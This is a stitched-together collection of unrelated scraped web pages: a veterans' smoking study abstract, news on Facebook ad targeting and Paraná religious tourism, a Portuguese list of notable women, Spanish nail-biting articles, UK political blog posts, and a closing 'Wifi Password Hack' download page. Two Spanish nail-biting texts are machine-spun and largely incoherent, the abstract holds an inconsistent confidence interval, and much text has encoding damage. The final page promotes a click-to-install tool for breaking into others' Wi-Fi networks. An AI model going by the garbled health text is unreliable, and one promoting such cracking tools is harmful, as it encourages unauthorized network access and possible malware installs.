Methods: Among veterans with smoking-related chronic medical illnesses identified from the National Veterans Health Administration administrative records from fiscal year 2012, we compared the characteristics of those with a diagnosis of TUD (International Classification of Diseases, 9th edition code 305.xx; nâ=â519,918), and those without such a diagnosis (nâ=â2,691,840). Using multiple logistic regression, we further explored the independent association of factors associated with TUD.
Results: SUD prevalence was markedly higher among those with TUD (24.9% vs 5.44%), including alcohol use disorder (20.4% vs 4.3%) and drug use disorder (13.5% vs 2.6%), compared with nonsmokers. On multiple logistic regression analyses, alcohol use disorder (odds ratio [OR] 2.94, 95% confidence interval [CI] 2.90â2.97) and drug use disorder (OR 1.97, 95% CI 1.94â1.99) were independently associated with current TUD diagnosis. Having any single SUD was associated with considerably high odds of having TUD (OR 3.32, 95% CI 3.29â2.36), and having multiple SUDs with even further increased risk (OR 4.09, 95% CI 4.02â4.16).
Conclusions: A substantial proportion of people with TUD diagnosis despite concurrent smoking-related medical illnesses are also likely to have other comorbid SUDs, complicating efforts at smoking cessation, and requiring a broader approach than standard nicotine-dependence interventions.|
|Facebook accused of targeting vulnerable teens with predatory ads [updated]|
The AustralianÂ has obtained confidential internal documents from Facebook that supposedly show how itâs possible for the company to take advantage of teenagersâ insecurities to benefit advertisers. The leaked document was written by two Australian Facebook execs and included how monitoring usersâÂ posts, comments and interactions could help figure out when people felt âdefeatedâ, âoverwhelmedâ, âstressedâ, âanxiousâ, âstupidâ, ânervousâ, âsillyâ, âuselessâ and a âfailureâ. InformationÂ about usersâ moodÂ could therefore be added to the data that Facebook sells advertisers. Currently Facebook provides ad buyers with userâs personal information including relationship status, location, age, and how often and in what manner people use the social…
This story continues at The Next Web
Or just read more coverage about: Facebook
|Estado pode ter roteiro de turismo religioso|
Durante dez dias, milhares de fiÃ©is participam das celebraÃ§Ãµes ao padroeiro de Siqueira Campos, no SantuÃ¡rio do Senhor Bom Jesus da Cana Verde
O ParanÃ¡ pode contar com um roteiro de turismo religioso para atrair turistas e peregrinos para locais de grande expressÃ£o religiosa no Estado. A informaÃ§Ã£o foi repassada pelo governador Beto Richa, em Siqueira Campo, no Ãºltimo sÃ¡bado (5), durante sua visita Ã Festa do Senhor Bom Jesus da Cana Verde. O evento, que estÃ¡ em sua 86Âª ediÃ§Ã£o, faz parte do CalendÃ¡rio Oficial do Estado e Ã© uma das festividades religiosas mais tradicionais do ParanÃ¡. A festa teve inÃcio no dia 28 de julho e se encerrou no domingo (06), dia do padroeiro.
O Estado, segundo o governador, planeja concluir o roteiro atÃ© o ano que vem. "O SantuÃ¡rio do Senhor Bom Jesus da Cana Verde serÃ¡ incluÃdo neste roteiro por ser um dos locais que, tradicionalmente, mais recebem romeiros em todo o Estado", explicou.
Durante os dez dias de celebraÃ§Ã£o do dia do padroeiro, o SantuÃ¡rio recebe cerca de 100 mil fiÃ©is, vindos de diversas cidades do ParanÃ¡ e tambÃ©m de outros estados, principalmente de SÃ£o Paulo. AlÃ©m de excursÃµes de Ã´nibus e carro, muitos romeiros vÃ£o a pÃ© ou a cavalo atÃ© Siqueira Campos em promessa ao padroeiro.
O governador e a secretÃ¡ria da FamÃlia e Desenvolvimento Social, Fernanda Richa, participaram da missa celebrada pelo frei Carlos Gonzaga, pÃ¡roco do santuÃ¡rio, e visitaram a sala dos milagres, local que reÃºne itens e fotografias deixadas por fiÃ©is que receberam graÃ§as do Bom Jesus da Cana Verde.
O prefeito Fabiano Bueno destacou a importÃ¢ncia do evento para Siqueira Campos. "Ã uma das maiores festas religiosas do ParanÃ¡. O municÃpios se preparou em todos os aspectos para receber todos os romeiros e autoridades que prestigiam este evento."
Frei Marcus Miranda, reitor do santuÃ¡rio, conta que a devoÃ§Ã£o a Bom Jesus da Cana Verde comeÃ§ou ainda no sÃ©culo 19. A imagem do padroeiro, esculpida em cedro vermelho, foi trazida de Minas Gerais ao municÃpio vizinho CarlÃ³polis entre os anos 1820 e 1830. "Ã uma imagem do tempo do barroco. NÃ£o temos dados certos, mas acredita-se que ela foi esculpida por Aleijadinho ou um de seus discÃpulos", disse Frei Marcus.
"A imagem representa o Jesus sofredor, aÃ§oitado na casa de Pilatos antes da crucificaÃ§Ã£o. Jesus segura em sua mÃ£o uma cana verde, que de acordo com a histÃ³ria, Ã© porque a estÃ¡tua veio de uma fazenda chamada Cana Verde", detalhou o reitor.
Na dÃ©cada de 1930, a Diocese de Jacarezinho determinou que a imagem fosse levada a Siqueira Campos, que jÃ¡ contava com uma parÃ³quia estabelecida. Foi entÃ£o que comeÃ§ou o culto ao padroeiro, que hoje reÃºne milhares de pessoas todos os anos.
LAR DO MENOR
ApÃ³s a festa, o governador visitou o Lar do Menor Siqueirense, instituiÃ§Ã£o criada em 1985 para desenvolver atividades sociais e educacionais a crianÃ§as e adolescentes em situaÃ§Ã£o de vulnerabilidade social.
A entidade Ã© uma das beneficiadas pelo programa Nota ParanÃ¡, que distribui parte do ICMS recolhido pelo Estado aos contribuintes e instituiÃ§Ãµes sociais. O Lar do Menor jÃ¡ recebeu R$ 127 mil do programa.
Em evento com a imprensa local Richa destacou alguns investimentos do governo do Estado em Siqueira Campos e outros municÃpios do Norte Pioneiro, como a revitalizaÃ§Ã£o da PR-092, que serÃ¡ duplicada no trecho urbano de Siqueira Campos. O projeto inclui tambÃ©m a construÃ§Ã£o de um contorno em Wenceslau Braz e a readequaÃ§Ã£o dos trevos de Siqueira Campos.
Reportagem Local/FOLHA DE LONDRINA
|Mulheres Que Fizeram Diferente|
Sei que é super clichê aproveitar o mês da Mulher para falar de Mulheres que fizeram diferente. Observe que eu escrevi "fizeram diferente" e não "a diferença". Porquê?
Meu intuito é falar sobre mulheres que fizeram coisas diferentes da maioria, isso não quer dizer que fizeram certo ou errado. Não é uma lista das mulheres mais generosas (claro que no meio da lista tem mulheres extremamente boas) mas as que tiveram CORAGEM de fazer algo diferente ou até reprovável pela sociedade na época. As escolhidas foram:
1. Joana D´Arc - heroína francesa que aos 13 anos começou a ter visões e receber mensagens ocultas. Orientada por essa paranormalidade Joana cortou o cabelo bem curto, vestiu-se de homem e entrou para o exército francês. Comandou tropas e conquistou o respeito do Rei Carlos VII. Invejada pelas vitórias, sofreu com conspirações e traições, chegou a ser vendida para os ingleses e acusada de praticar feitiçaria. Foi queimada viva em 1431. Precisa falar mais? Santa, bruxa ou louca? Não importa! Ela foi sem sombra de dúvida uma mulher corajosa e determinada.
2. Marilyn Monroe - indiscutivelmente foi uma das mulheres mais sexy dos últimos tempos. Apesar da sua triste história de vida, órfã e abusada inúmeras vezes pelos lares que passou. Marilyn reverteu essas tragédias em força para conseguir se destacar no mundo do entretenimento. Sua performance nos palcos seduziu homens e mulheres, mas o sucesso foi fruto da sua personalidade vulnerável, sua contraditória inocência aliada com a sensualidade natural.
3. Leila Diniz - atriz brasileira de personalidade ousada e inimiga do conservadorismo. Ela foi responsável por quebrar tabus e ser um ícone da liberdade feminina. O que para nós hoje é simples e rotineiro, no final da década de 60 não era. Leila foi corajosa a afirmar em entrevistas coisas da sua vida sexual e ser espontânea ao ir à praia grávida de biquíni.
4. Catarina de Siena - mesmo analfabeta, ditou inúmeras obras e cartas solicitando aos papas, líderes e reis da época uma unificação da Igreja e a pacificação dos Estados Papais. Consagrada como Santa Catarina na Igreja Católica, ela cuidou dos enfermos e abandonados quando a peste se alastrou por toda a Europa. Independente de religião, devemos reconhecer pessoas boas e de inigualável coragem.
5. Madre Teresa de Calcutá - ainda nessa linha de mulheres guerreiras e generosas. A Missionária dedicou sua vida aos pobres, solicitou autorização à igreja para dedicação exclusiva aos famintos e necessitado da Índia. Ganhou Nobel da Paz em 1979. E foi outro grande exemplo de coragem e caridade em vida.
6. Diana, Princesa de Gales - eu não poderia deixar de citar Lady Di. Afinal ela casou-se com um príncipe, foi exemplo de educação e elegância, um ícone da moda e filantropa. Foi extremamente corajosa ao quebrar os protocolos e pedir o divórcio. Admirada por seu trabalho de caridade, virou celebridade mundial. Faleceu em 1997 com seu namorado Dodi Al Fayed em polêmico acidente de carro.
8. Chiquinha Gonzaga - "ô abre alas, que eu quero passar"... pianista, regente e compositora das marchinhas carnavalescas mais famosas do Brasil. Mulher de gênio forte e decidida, dedicou-se a música mesmo contra a vontade de todos. Casou-se três vezes, seu romance mais invejável e duradouro foi com um rapaz 36 anos mais novo que ela. Para viver com ele, Chiquinha chegou a adotá-lo. Juntos ficaram até a morte dela aos 87 anos de idade.
9. Cora Coralina - nasceu em Goiás, doceira por profissão, produziu uma obra poética rica em elementos do dia a dia. Sua poesia atingiu um nível de qualidade literária altíssimo, não visto facilmente por outros artistas do nosso país. Uma mulher simples que viveu parte da sua vida longe dos grandes centros, tinha dom e sabedoria para escrever sobre o cotidiano.
“Mesmo quando tudo parece desabar, cabe a mim decidir entre rir ou chorar, ir ou ficar, desistir ou lutar; porque descobri, no caminho incerto da vida, que o mais importante é o decidir.” Cora Coralina
10. Você, minha mãe, sua avó, aquela vizinha... mulheres anônimas que lutam todos os dias para manter a família unida, que ajuda o próximo sem nada em troca, que ama seus filhos e a dos outros também. Mulheres guerreiras, profissionais, do lar, amantes, mães, tias, avós, esposas, amigas... politizadas ou analfabetas. Mulheres ricas ou pobres que acertam e erram, mulheres de verdade, assim como eu e você também merecemos um lugar nesta lista! Tenha coragem de fazer, mesmo que erre. Tenha coragem de viver, mesmo que morra. Seja autêntica e acredite em seus sonhos, só não vale passar por cima de ninguém e nem prejudicar o próximo porque isso não é coragem, é ambição desacerbada!
|Informe inicial sobre detener morder uÃ±as||Supongo que tengo que han logrado aumentarlos eficientemente unas 3 veces, generalmente por la cantidad de meses en un momento dado, sin embargo nunca fue sencillo y muchas estrategias que intentÃ© fuente fallido.|
Esta operaciÃ³n puede llevarse a cabo dentro de un lenguaje simbÃ³lico, como en deseos, o en la hipnosis extremadamente especÃficos Londres, basado en lo que establece el inconsciente. Sin embargo, para sin importar lo que la razÃ³n principal, continua onychophagists (uÃ±as pinzas cortantes) probablemente serÃ¡ consciente de cuÃ¡n difÃcil es interrumpir esta perjudicial prÃ¡ctica.
Actualmente esto aparecieron mis uÃ±as han sido mÃ¡s tiempo, asÃ que me creÃ³ llegan a sentirse mucho mÃ¡s bien sobre la observaciÃ³n de los adelantos mÃ¡s. Numerosos pinzas cortantes de uÃ±as no reconocerÃ¡ una vez toman placer en los hÃ¡bitos y a fin de que no tienen ninguna manija superior a Ã©l.
Usted debe hacer uso de la crema hidratante con frecuencia para que se puedan preservar los poros y la piel muy suave y ademÃ¡s evitar las cutÃculas rasgado. Por ejemplo, como un sustituto de morderse las uÃ±as serÃ¡s capaz a limarlas.
Lo verdaderamente se observa con frecuencia en un montÃ³n de personas fÃsicas que posean el comportamiento de un clavo muerde una vez que estÃ¡n en la ansiedad o en circunstancias difÃciles. No podrÃa ser Ãºtil a veces; para mantener a ponerse un guante a pesar del hecho de que las condiciones meteorolÃ³gicas en cualquier otro caso.
Pinzas cortantes de uÃ±as suelen sensaciÃ³n y observaciÃ³n que de ninguna manera perturbadoras o realizar daÃ±o a nadie con su prÃ¡ctica, Â¿quÃ© puede ser el querer o la justificaciÃ³n para este tipo de una protesta substancial hacia ellos despuÃ©s de software, que son capaces de ir sobre su tÃpico estilo de vida sin embargo el minuto usted mucho como conjunto los dedos alrededor de su boca obtendrÃ¡ un sabor impresionante sin duda posiblemente amargo o amargo.
UÃ±as mordidas ser increÃblemente malestar vulnerable, en particular donde los poros y la piel satisface el borde de uÃ±as. La pintura en esmalte de uÃ±as, no funciona, no funcionarÃ¡ para usted personalmente posiblemente.
Pero tengo un mÃ©todo de fÃ³rmula mÃ¡gico en su caso...He detenido mordiendo mis uÃ±as permanentemente y por lo tanto se puede!Realmente, mucha gente no use medicina peligrosa o esmalte de uÃ±as.
Notificar al individuo a proporcionar convenido en recordatorio y nuevamente. Y este tipo de selecciÃ³n de piel o pelo-tirando ocasionalmente podrÃa acompaÃ±ar clavos penetrantes. Pulse de nuevo las cutÃculas muy cuidadosamente y mantenerse alejado de picar y enjuague con calor h2o.
Esto fue simplemente porque gastado mucho tiempo jardinerÃa que solÃa estar adquiriendo generalmente polvo atrapado firmemente por debajo de mis uÃ±as nuevas.
En un establecido de guantes para proteger las uÃ±as de su asalto del diente. Porque morder uÃ±as es comÃºnmente una reacciÃ³n a la ansiedad, creando una reacciÃ³n distinta puede hacer salir llevando a cabo. Es posible considerar ganchillo Cruz costura y tejido. Sin embargo, sÃ³lo una pequeÃ±a proporciÃ³n de las otras personas mayores morder las uÃ±as.
DespuÃ©s de que el niÃ±o entiende la razÃ³n de ser, es probable que esto le ayudarÃ¡ a detener. Funcionamiento durante diez minutos es suficiente para empezar a disminuir su cantidad de presiÃ³n y comenzar significativamente mayor emociÃ³n!
Clavo morder (onychophagia) es un hombre de Ã¡rea y las mujeres hacen para aliviar la tensiÃ³n. Cualquier momento que un hombre o una mujer comienza a morder inconscientemente ausente con las uÃ±as, un estilo amargo definitivo vendrÃ¡ como un recordado para detener a morderse las uÃ±as.
Ahora existe varios uso razonable respecto al producto de belleza caros conocido como esmalte de uÃ±as del dedo. Si no tienes ninguna pista de donde proviene su rutina, entonces el tiempo posterior muerden las uÃ±as, dejar de fumar y pensar por quÃ© le sucede a llevar a cabo, a veces puede ser aburrimiento comunes demasiado.
Tomar una decisiÃ³n para vestir en un par de guantes para proteger las uÃ±as en la embestida de su diente respectivo.Â¿No parece Ãºtil de vez en cuando; para mantener un guante a pesar del hecho que el clima se establece en cualquier otro caso que se divierten. Posiblemente trate de manejo claro de este tipo de circunstancias o cuando son inevitables, encontrarÃ¡ mÃ¡s mÃ©todos para hacer frente a estas circunstancias.
Sin duda, clavo mordiendo soluciones necesita estar dentro de su muy tenga un futuro previsible.
Preferencias tan amargas que usted simplemente no va a los dedos una vez mÃ¡s dentro de su boca.Morderse las uÃ±as cada entiende cÃ³mo resistente es ayudar a mantener mordiendo las uÃ±as, con no amonestÃ³ a conseguir por Ã©l.
Es el concepto que 3 en los conductores reconocidos de la raÃz de la mala prÃ¡ctica es genÃ©tico, neurolÃ³gico, o posiblemente una disfunciÃ³n conductual y que normalmente existen en las personas que se encuentran ambos en el hÃ¡bito de la droga, tener TOC, condiciones de la mente, retraso psicolÃ³gico o privaciÃ³n sensorial este tipo de ceguera o sordera. MÃ¡s, vas a designar el apagado no cubrirlas!
Por lo tanto permite comenzar a debatir cÃ³mo morderse las uÃ±as repercute en su salud en general. A veces, dibujo, garabatos o simplemente disfrutar con una cosa como parte de las Palmas es generalmente una ayuda maravillosa.
View the original article here
|MÃ¡s se parecen a frenar morder uÃ±as||Supongo que tengo que han podido desarrollarlas productivamente sobre tres veces, con frecuencia por la cantidad de meses en un momento dado, sin embargo no fue de ninguna manera simple y muchos enfoques intentÃ© fallÃ³.|
Esta funciÃ³n puede llevarse a cabo dentro de un lenguaje simbÃ³lico, como en objetivos, o en la hipnosis realmente especÃficos Londres, basado en lo que decide el inconsciente. No obstante, para sin importar lo que la razÃ³n principal, onychophagists a largo plazo (uÃ±as pinzas cortantes) probablemente serÃ¡ consciente de cuÃ¡n duro es realmente interrumpir esta daÃ±ando la rutina.
Antes esto parecÃa mis uÃ±as habÃan sido mÃ¡s largo, fabricado por lo tanto me siento mucho mÃ¡s beneficioso sobre ver mÃ¡s avances. Un montÃ³n de uÃ±as pinzas cortantes no comprenderÃ¡n una vez toman placer en la conducciÃ³n y para que no tengan ninguna manija superior a Ã©l.
Es necesario utilizar la crema hidratante tÃpicamente como una forma de mantener los poros y la piel muy delicada y ademÃ¡s de parada de las cutÃculas rasgado. Como ejemplo, como una alternativa de morderse las uÃ±as serÃ¡s capaz a limarlas.
Verdaderamente se observa generalmente en un montÃ³n de gente que la prÃ¡ctica de clavo mordiendo despuÃ©s de que estÃ©n en la ansiedad o en situaciÃ³n difÃcil. Bueno no puede demostrar para arriba sin problemas a veces; para ayuda mantener deportivos un guante, aunque el clima necesita o bien.
Pinzas cortantes de uÃ±as tÃpicamente verdaderamente sienten y observaciÃ³n son bajo ninguna circunstancia inquietante o realizar daÃ±o a nadie con su prÃ¡ctica, lo que puede ser el querer o la justificaciÃ³n para este tipo de una protesta substancial hacia ellos despuÃ©s de software, es posible ir sobre su estilo de vida comÃºn aunque el minuto que usted un gran trata como conjunto los dedos alrededor de su boca obtendrÃ¡ un estilo sorprendente tanto amargo o amargo.
UÃ±as mordidas ser increÃblemente dolor vulnerables, especÃficamente en la que los poros y la piel cumple con el borde de uÃ±as. La pintura en esmalte de uÃ±as, no funciona, no harÃ¡ personalmente posiblemente.Pero tengo un mÃ©todo de fÃ³rmula mÃ¡gico en su caso...He detenido mordiendo mis uÃ±as permanentemente y asÃ eres capaz!
En realidad, la mayorÃa de la gente nunca use perjudicial medicina o esmalte de uÃ±as.
Informar al individuo para proporcionar convenido en recordatorio y detrÃ¡s otra vez. Y este tipo de selecciÃ³n de piel o pelo-tirar podrÃa acompaÃ±ar a menudo penetrantes clavos.
Mantenerse alejado de la corte conducir otra vez las cutÃculas con bastante cautela y enjuague con agua potable de calor. Esto fue simplemente porque invertÃ una jardinerÃa de mucho tiempo que habÃa ido adquiriendo generalmente suciedad atrapada firmemente por debajo de mis uÃ±as nuevas.
Vestido en un establecido de guantes para defender las uÃ±as de su asalto de su diente. CÃ³mo dejar graves clavo mordiendo considerando morder uÃ±as es comÃºnmente una reacciÃ³n a la ansiedad, creando una reacciÃ³n distinta puede hacer salir sucediendo.
Son capaces de tratar de ganchillo, Cruz coser o tejer. SÃ³lo una pequeÃ±a proporciÃ³n de otro crecido ups sin embargo muerden las uÃ±as. DespuÃ©s de que el niÃ±o entiende la explicaciÃ³n, esto puede ayudarle a prevenir.
Trabajo durante diez minutos es suficiente para empezar disminuyendo sus rangos de tensiÃ³n y comenzar la experiencia significativamente mucho mejor!
Clavo morder (onychophagia) es una cosa individuos hacer para aliviar la ansiedad. Cualquier momento que una persona comienza a morder inconscientemente ausente en las uÃ±as, un sabor amargo definitivo llega a ser un recordado para evitar morderse las uÃ±as.
Ahora hay numerosos uso prÃ¡ctico hacia la mercancÃa costosa belleza contemplada como esmalte de uÃ±as del dedo. Si usted no tiene ninguna pista donde su rutina deriva luego otra vez muerden las uÃ±as, dejar de fumar y tomar en consideraciÃ³n por quÃ© puede llevar hacia fuera, a menudo puede ser aburrimiento comunes tambiÃ©n.
Determinar en un par de guantes para proteger las uÃ±as en el ataque del diente.No parece ser Ãºtil de vez en cuando; para ayuda mantener deportivos un guante, aunque el clima mandatos o bien. Tanto probar manejo claro de este tipo de circunstancias o cuando son inevitables, usted podrÃa descubrir mucho mejores mÃ©todos para hacer frente a estos escenarios.
De hecho, debe ser clavo mordiendo tratamientos como parte de su potencial extremadamente oso. Preferencias tan amarga que solo serÃ¡ probablemente no establece sus dedos una vez mÃ¡s dentro de su boca.Morderse las uÃ±as cada entiende cÃ³mo resistente es ayudar a mantener mordiendo las uÃ±as, con hacia fuera consiguiendo reprendido por Ã©l.
Es el principio que cerca de tres en la raÃz reconocida de los pobres es de comportamiento genÃ©tico, neurolÃ³gico, o posiblemente una disfunciÃ³n conductual y que son con frecuencia actual en las personas que se encuentran posiblemente en hÃ¡bito de drogas, tener TOC, enfermedades de la mente, retraso psicolÃ³gico o privaciÃ³n sensorial este tipo de ceguera o sordera. MÃ¡s, vas a seÃ±alar de no disimularlos!
Por tanto permite Inicio apagado para debatir cÃ³mo morderse las uÃ±as repercute en su bienestar. A menudo, dibujar, dibujar o simplemente activamente jugando con una cosa en las palmas podrÃa ser una ayuda maravillosa.
View the original article here
|Como dejar de comerse las uÃ±as para siempre|
Casi todo el mundo ha tenido al menos un tenso momento en su vida la mala costumbre de comerse las uÃ±as. Tal vez usted se ha encontrado con las uÃ±as entre los dientes mientras se estÃ¡ sentado a travÃ©s de una conferencia clase aburrida, anticipando un encuentro que cambia la carrera con su supervisor, o observando ansiosamente el destino de tu pelÃcula de terror favorita heroÃna.
Mordiendo las uÃ±as es un hÃ¡bito que suele comenzar en la infancia. Los estudios muestran un 60% de los niÃ±os y el 45% de los adolescentes se muerden las uÃ±as. Morderse las uÃ±as es menos comÃºn despuÃ©s de los 18 aÃ±os, pero puede continuar hasta la edad adulta. Muchos adultos y niÃ±os a menudo no saben que estÃ¡n mordiendo las uÃ±as ya que al hacerlo se ha convertido en un hÃ¡bito.
El problema puede variar desde un hÃ¡bito ocasional y ligera para un problema actual y mÃ¡s grave.
Como dejar de comerse las uÃ±as y cuales son sus causas?
Morderse las uÃ±as tambiÃ©n puede ser un sÃntoma de un trastorno psicolÃ³gico, como el trastorno obsesivo-compulsivo (TOC). Las personas que se lavan las manos varias veces en una fila o comprobar las cerraduras de las puertas delanteras compulsivamente tambiÃ©n pueden morder las uÃ±as, como parte del mismo espectro de comportamientos. Muchos niÃ±os que son mordedores de uÃ±as tambiÃ©n tienen otros trastornos psiquiÃ¡tricos, como trastorno por dÃ©ficit de atenciÃ³n con hiperactividad (TDAH), trastorno de oposiciÃ³n desafiante (ODD), trastorno de ansiedad por separaciÃ³n, o mojar la cama.
Regular mordiendo las uÃ±as que causa graves daÃ±os a la uÃ±a y la piel circundante puede ser considerado una forma de auto-mutilaciÃ³n, similar a los comportamientos de corte y afines.
Problemas con uÃ±as Morder Regular
Morderse las uÃ±as tiene consecuencias tanto fÃsicas como emocionales. Regularmente morderse las uÃ±as y las cutÃculas puede dejar sus dedos roja y dolorida. El Ã¡rea de la piel alrededor de las uÃ±as pueden sangrar e infectarse. Las bacterias y los virus pasan de los dedos en la cara y la boca pueden hacer vulnerable a la infecciÃ³n.
Morderse las uÃ±as tambiÃ©n puede daÃ±ar los dientes, dando lugar a mal alineados, los dientes debilitados.
La apariencia de las uÃ±as mordidas hacia abajo tambiÃ©n puede ser embarazoso, que sÃ³lo puede aÃ±adir a la ansiedad y el estrÃ©s.
Como dejar de comerse las uÃ±as - Tratamiento de uÃ±as mordidas
Muchos niÃ±os crecen con el tiempo de morderse las uÃ±as. Pero para los adolescentes y adultos que todavÃa luchan con la costumbre, algunas tÃ©cnicas han demostrado resultados.
Escudo tus uÃ±as con un esmalte con sabor amargo morder uÃ±as. El sabor desagradable te desanime de morder. TambiÃ©n puede utilizar un clavo normal transparente o de color de uÃ±as para evitar morderse las uÃ±as. La misma tÃ©cnica se puede trabajar con su hijo.
Mantenga las uÃ±as cortas. Usted tendrÃ¡ menos de un clavo a morder.
CÃ³mo manicuras regulares. Si vas a gastar el dinero para mantener las uÃ±as buscando atractivo, serÃ¡ menos probable que los muerda.
Utilice una tÃ©cnica alternativa para manejar su estrÃ©s. Trate de yoga, la meditaciÃ³n, la respiraciÃ³n profunda, o apretar una pelota anti-estrÃ©s para que se relaje.
Coloque una banda elÃ¡stica alrededor de la muÃ±eca y ajÃºstela cada vez que reciba el impulso de morder las uÃ±as.
Si has probado estas tÃ©cnicas y nada funciona, use guantes o poner vendas autoadhesivas en las puntas de los dedos para que sus uÃ±as no se podrÃ¡ acceder a morder.
Hable con su mÃ©dico o profesional de salud mental si morderse las uÃ±as persiste junto con la ansiedad y el estrÃ©s. PodrÃa ser una seÃ±al de un problema psicolÃ³gico mÃ¡s grave, incluyendo OCD, que puede tratarse con asesorÃa psicolÃ³gica o medicamentos.
MÃ¡s info: sobre como dejar de comerse las uÃ±as
|Cameron's unbelievable untruth||David Cameron has been pretty up front about cutting public servants but as pressure mounts regarding his government's failure to tackle tax avoidance, he's starting to deny that they're happening.|
When faced with a question during today's PMQs from Labour MP Teresa Pearce about why numbers of HM Revenue and Customs staff were being cut, just when a crackdown had been promised on tax avoidance, Cameron responded by stating that the government had actually presided over an increase in staff levels.
He must have seen different figures to the ones I've seen. In February 2010, just before the coalition came in, the total headcount for HMRC staff was 78,078. Two years later this figure was down to only 70,853. The government are intending to cut a further 10,000 jobs by 2015. Hard to see where his claim of presiding over an increase comes from.
He may of course be referring to the fact that they're reinvesting Â£900m into the department to deal with tax avoidance and evasion. However, this has to be seen in the wider context of them cutting its budget by Â£3bn over three years. So in fact, despite their much heralded 'investment', it means they're cutting just over Â£2bn from the budget of HMRC while claiming to get tough on avoidance. And these cuts are taking the form of sacking 10,000 staff and yet another massive tax office closure programme.
As Graham Black, the President of the Association of Revenue Customs, so rightly put it in his Comment is Free piece:
"Does it make sense to cut the one part of the government that brings cash in, when we are having to cut back on services to the vulnerable across the board?"
Well clearly it doesn't which is why the PM is so keen to deny that they're doing it.
|A crucial week for justice||On Tuesday we'll see if our elected political representatives yet again undo the good work of our unelected representatives as the Legal Aid Bill returns to the Commons for MPs to consider the Lords' amendments.|
Peers made changes to the Bill that would mean that the worst of the legal aid cuts in the legislation would be removed. Access to legal aid and the way that it is delivered would be protected for those who have suffered domestic violence, for vulnerable children and for disabled people.
The government will be no doubt keen to use financial privilege as an excuse to overturn these changes like they did recently to reverse changes to their controversial welfare reforms. However, if costs are to be used as an excuse as removing access to free legal advice to hundreds of thousands of people when they need it most, perhaps Ministers should consider the Â£43 million spent on consultants by the MoJ in the last year and the Â£12m that's been wasted an an e-Working system that is years behind schedule and has virtually collapsed.
What's really happening to our legal system here of course is that it is becoming increasingly the preserve of those who are able to pay for it. As Heather Brooke pointed out last week, while 140 local courts have been closed and legal aid is cut, Â£300m has been invested in the Rolls Building (home of the failed e-Working system) which is to handle high-end commercial disputes for a mostly foreign clientele.
It's not just Russian Oligarchs that are benefiting from changes to our justice system. The Association of British Insurers has admitted it will profit from the legal aid cuts. Last year it was revealed that the Justice Minister responsible for driving through these reforms, Jonathan Djanogly will personally profit from the plans as he has a personal stake in the insurance industry. Now that's what I call financial privilege.
Possibly the best hope of amendments - like Baroness Scotland's that ensures victims of domestic violence have access to legal aid and former Paralympian Tanya Grey Thompson's that ensures those who are eligible aren't forced to phone a call centre for advice - surviving the glare of the coalition is the lack of time Parliament has been able to afford to the legislation between the Easter break and the end of this parliamentary session. Who says MPs having long holidays is a bad thing!
If you'd like to contact your MP to ensure we don't lose out on legal aid when we need it most visit the 38 degrees site ahead of Tuesday's vote.
|Wifi Password Hack v2.3.2 Latest|
Wifi Password Hack v2.3.2 Latest | 4.99 MB
How to hack a Wifi password? This is not a easy task, so after many years we have crated a very interesting program. This program is called Password Hack v5 and Wifi hack wiil be piece a cake.
Step 1: Just point your mouse to the social buttons bellow!
Step 2: Click and the installation process will begin
Next you must open the program and enter SSID code. The you only need to click âstartâ and the password will be broken.
How to hack a Wi-Fi network and how to find itâs password?
First, let me tell you what Wi-Fi is! Wi-fi is a recent technology used by gadgets to connect to the Internet without the use of wires. The Wi-Fi Alliance says that Wi-Fi represent âany wireless local area network (WLAN) products that are based on the Institute of Electrical and Electronics Engineers (IEEE) 802.11 standardsâ. Because many WLAN use the same standard, WLAN became a synonym for the Wi-Fi word. Interbrand invented Wi-Fi as a play on words with Hi-Fi (high fidelity), and also created the Wi-Fi logo. This certified trademark can be used only by those Wi-Fi adaptors which pass the Wi-Fi Alliance tests and standards. If it has to do with a connected cable, then the Wi-Fi network is much more vulnerable to hackers attacks. Sites which arenât sertified with SSL and are usually unencrypted are those which will try to steal the Wi-Fi password and any other private datas such as images or account passworrds. Even this intruder will try to take them, it will be harder for them if the router is protected with WPA, WPA2 or WEP encyption security. An extra feature extra from 2007, known as Wi-Fi Shielded Startup (WPS), experienced a serious catch in which let a great hacker to recoupy the actual router. The latest router devices come with the strongest protection ever known and are very hard for hackers to be breaken into. Thatâs, of course, if you donât change the password with which is proveded. Ussualy, the routers have generic names and passwords such as the brand or name of the router, or even admin or 1234 as username and password.
The Wi-Fi is used nowdays for devices such as PC, Video Console such as PS 2, Ps 3, Xbox 360, PS portable (except the E-1000 one) and any other console which have 3G or Wi-Fi connection toghether with laptops and smart and non-smart phones. Those devices can access the Wi-Fi by using the sho called hotspots, where free internet is ussually given by restaurants or Internet providers. You need to be within 100 m to receive the signal, and it can only be received outdoors. What you receive indoors is the signal of a neighbourâs router, not a hotspot one. Hotspots can have low signals (10-20 meters) to strong signals, which take a few kilometers.
Any device which has Wi-Fi connectivity can receive Internet signal from this hotspots. The interconected devices are called hang-outs and can be seen each other for distances of over several miles. Outdoor open public Wi-Fi technologies have been used properly with wifi mesh networks with Liverpool, London, and gennerally in the big cities from all the United Kngdom. Wi-Fi is a great way for companies to promote their businessess; itâs very clear that, if there are two restaurants with the same prices and services, but one have also Wi-Fi connectivity, the one with the Wi-Fi will win. And it is not too expensive to provide Wi-Fi, just connect the Internet cable to a router and let it flow. Enthusiasts or perhaps specialists who want to offer products and services or even to enhance company with selected parts at times offer no cost Wi-Fi gain access to. Also there are companies which, in exchage for space used by antenaâs on the rooftop of the flat of blocks, gife free internet in that flat. The are radions risks but who cares when you have free Internet, right? I thought so!
If you want to aquire a router, take a brand one, like Belkin or D-link, because the no-name chinese ones are very vulnerable to hacker attacks and can break easely. Donât risk to lose all your money from the bank accounts or images with your daughter naked posted on the Internet just because you didât wanted to spend a couple of extra pennies at the right time.
The same can apply to a mobile, battery powerd router, which is included in every cellphone existent. Many phone provider give free traffic for their clients in WAP, 2G, 3G or even 4G connectivity, depending on the country you live. Almost all smartphones have nowdays a easy OS to use such as Android, iOS, and the now dead Symbian OS, which make possible to connect to any Wi-Fi decive and also to interconnect. Internet pucksgive separate services in this sort at the same time, without use of any touch screen phone; these include this MiFi, as well as WiBro branded equipment. Out there are also many devices such as notebooks, ultrabooks and even laptops which use Wi-Fi to find any information the users want.
Now, letâs turn back to the topic of this article. How to hack a Wi-Fi network and how to find itâs password? This is a question many people asked. But now you don;t have to ask yourself anymore. Here is the sollution to all those frustrating days when you were at countrysite, isolated from the rest of the world and you found just a single, slow router. And that was passworded too. Then you and your phone are useless. Thatâs why our team of developers invented the most powerfull tool on the internet:
